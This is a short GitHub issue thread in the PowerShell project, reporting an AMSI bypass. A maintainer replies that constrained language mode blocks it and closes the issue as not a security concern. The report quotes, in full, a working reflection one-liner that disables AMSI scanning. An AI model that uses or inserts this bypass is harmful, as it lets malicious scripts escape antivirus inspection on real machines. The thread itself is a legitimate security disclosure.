### ISSUE TITLE
Set s_amsiInitFailed to true to avoid AMSI content scan

### ISSUE THREAD

**Issue by u-s** [PowerShell/PowerShell#2906]
Attacker may bypass AMSI by adding "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('s_amsiInitFailed','NonPublic,Static').SetValue($null,$true)" to script. 

This attack was described in this article: http://www.labofapenetrationtester.com/2016/09/amsi.html

**Comment by SteveL-MSFT** [comment]
CC @LeeHolmes

**Comment by PaulHigin** [comment]
If an attacker can run C# reflection code then the machine is already compromised.  This would be a concern if the machine was locked down with application white listing (such as with AppLocker or DeviceGuard UMCI), but in this case locked down PowerShell runs in constrained language mode and does not allow DotNet reflection code to run which prevents the AMSI bypass.

**Comment by PaulHigin** [comment]
I am closing this issue since I believe this is not a security concern.
